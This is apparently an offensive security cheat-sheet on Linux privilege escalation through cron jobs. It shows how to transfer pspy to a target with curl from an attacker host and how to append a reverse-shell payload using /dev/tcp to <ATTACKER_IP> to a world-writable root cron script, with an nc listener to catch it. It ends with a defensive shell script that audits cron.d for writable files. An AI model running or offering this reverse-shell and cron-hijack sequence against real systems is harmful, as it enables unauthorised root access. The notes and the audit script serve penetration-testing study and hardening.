PRIMARY CATEGORY → LINUX PRIVESC
Enumeration
Cron.d Directory
Typically a non-privileged user has read permissions over the existing cron files within the /etc/cron.d directory
We should also always check whether the current user has write permissions on any of them
ls -l /etc/cron.d
PSpy
Setup
From the Attacker ⚔️
- Cloning the Github Repository and Compiling the Go Binary
git clone https://github.com/dominicbreuker/pspy PSpy
cd !$ && go build -ldflags '-s -w' .
upx pspy
- Transferring the binary to the target
From the Attacker ⚔️
python3 -m http.server 80
From the Target 🎯
cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/pspy' --remote-name
Usage
chmod 700 pspy && ./pspy -pf -i 1000
Abuse
World-Writable File
Let's suppose that we have compromised an entire web application and established a connection to the target through a Reverse Shell
Then we start enumerating the target in order to escalate privileges, and we find an interesting backup.bash script that we have write permissions for
We have done this by issuing the following command, which searches the system for world-writable files, that is, files on which any user (including the current one) has write permissions
find / -path '/proc' -prune -o -perm -0002 -type f 2> /dev/null
Since there is a script called backup.bash, there may be a Cron Job that runs it at regular intervals
Therefore, we could transfer a PSpy binary to the target in order to monitor new system processes
We can run it as follows →
./pspy -pf -i 1000
After a while, we see that a Cron Job runs the backup.bash script and a TAR file is created within the /var/www/html directory
So, since we have write permissions over the given script, we can simply edit it and add the following payload at the end
bash -i &> /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1
Then, we have to run the following command from the attacker machine in order to receive the incoming shell a.k.a Reverse Shell
nc -nlvp <PORT>
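As an added check from the defender's side (not part of the original notes, and not pspy's code), the following script audits a cron.d-style directory for the two weaknesses these notes rely on: a cron file that is itself world-writable, and a cron entry whose referenced script is world-writable (the backup.bash case above). It runs against a constructed fixture directory rather than the real /etc/cron.d; the names audit_cron_dir, is_world_writable, make_fixture and the fixture paths are my own, and the script assumes a find(1) that supports -L and -perm -0002 (GNU and BSD both do).

```shell
#!/bin/sh
# Added audit example: flag cron.d entries that a low-privileged user could hijack
# because the cron file, or a script it runs, is world-writable.
# Assumes find(1) supports -L and -perm -0002.

# is_world_writable PATH: succeed if PATH resolves to a regular file with o+w set.
# -L follows symlinks, so a 0777 symlink to a safe binary is not a false positive.
is_world_writable() {
    [ -n "$(find -L "$1" -perm -0002 -type f 2>/dev/null)" ]
}

# audit_cron_dir DIR: print one finding per line; return 1 if any, 0 if none.
# DIR is expected to use the /etc/cron.d layout: m h dom mon dow user command...
audit_cron_dir() {
    dir="$1"
    found=0
    for cronfile in "$dir"/*; do
        [ -f "$cronfile" ] || continue
        # Anyone who can edit the cron file can add a job that runs as root.
        if is_world_writable "$cronfile"; then
            echo "WRITABLE_CRONFILE $cronfile"
            found=1
        fi
        while IFS= read -r line || [ -n "$line" ]; do
            case "$line" in
                ''|\#*|[A-Za-z_]*=*) continue ;;   # blank, comment, or VAR=value
                @*) cmd=$(printf '%s\n' "$line" | awk '{$1=$2=""; print}') ;;
                *)  cmd=$(printf '%s\n' "$line" | awk '{$1=$2=$3=$4=$5=$6=""; print}') ;;
            esac
            # Every absolute path in the command is a candidate target, so
            # "root /bin/sh /opt/backup.bash" is caught via its second argument.
            set -f   # no globbing while splitting the command into words
            for word in $cmd; do
                case "$word" in /*) ;; *) continue ;; esac
                [ -f "$word" ] || continue
                if is_world_writable "$word"; then
                    echo "WRITABLE_TARGET $cronfile -> $word"
                    found=1
                fi
            done
            set +f
        done < "$cronfile"
    done
    return "$found"
}

# make_fixture: build a constructed cron.d tree under a temp dir and print its path.
# The job runs /bin/sh on a script that has been left mode 666, the case from the notes.
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/cron.d" "$fx/opt"
    printf '#!/bin/sh\ntar -czf /var/www/html/backup.tar.gz /var/www/html\n' > "$fx/opt/backup.bash"
    chmod 666 "$fx/opt/backup.bash"
    printf 'MAILTO=root\n*/5 * * * * root /bin/sh %s/backup.bash\n' "$fx/opt" > "$fx/cron.d/backup"
    chmod 644 "$fx/cron.d/backup"
    echo "$fx"
}

# Stand-alone run against the constructed fixture; point audit_cron_dir at
# /etc/cron.d to audit a real host.
demo=$(make_fixture)
if audit_cron_dir "$demo/cron.d"; then
    echo "no hijackable cron entries found"
else
    echo "review the findings above"
fi
rm -rf "$demo"
```

On the fixture this prints a single WRITABLE_TARGET line naming the cron file and the 666 script; once the script is chmod 644 the audit is silent and returns 0, so it can be dropped into a nightly job or a CI check and failed on exit status. Mode bits are checked with find rather than the shell's -w test because -w answers for the user running the audit (always true for root), whereas the risk is the o+w bit itself.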